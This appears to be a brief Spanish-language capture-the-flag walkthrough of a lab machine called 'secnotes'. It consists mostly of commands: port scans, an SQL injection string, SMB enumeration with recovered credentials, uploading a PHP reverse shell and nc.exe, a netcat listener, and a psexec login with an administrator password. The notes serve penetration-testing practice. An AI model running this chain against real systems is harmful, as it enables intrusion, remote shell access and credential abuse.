nmap -A -p- -oA secnotes 10.129.178.250 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA secnotes 10.129.178.250
nmap -sU -O -p- -oA secnotes-udp 10.129.178.250
nikto -h 10.129.178.250:80
' or 1= '1
Le damos click a new site y vemos las credenciales de
tyler:92g!mA8BGjOirkL%OG*&
![[Pasted image 20211229083020.png]]
Trate de usar psexec para poder logearme pero no fue exitoso.
crackmapexec smb 10.129.178.250 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --users
crackmapexec smb 10.129.178.250 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --users
crackmapexec smb 10.129.178.250 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --groups
crackmapexec smb 10.129.178.250 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --shares
cat reverse.php
smbclient //secnotes.htb/new-site -U tyler
put reverse.php
put nc.exe
https://10.129.178.250:8080/reverse.php
nc -lvnp 443
Nos dirigimos a el desktop de tyler Y vemos un bash.lnk
type bash.lnk
#find files in windows looking for bash
where /R c:\windows bash.exe
Corremos el archivo de bash Y vemos que somos root
cat .bash_history
python3 /opt/impacket/examples/psexec.py secnotes.htb/administrator:'u6!4Zwgw0M#^0Bf#Nwnh'@10.129.178.250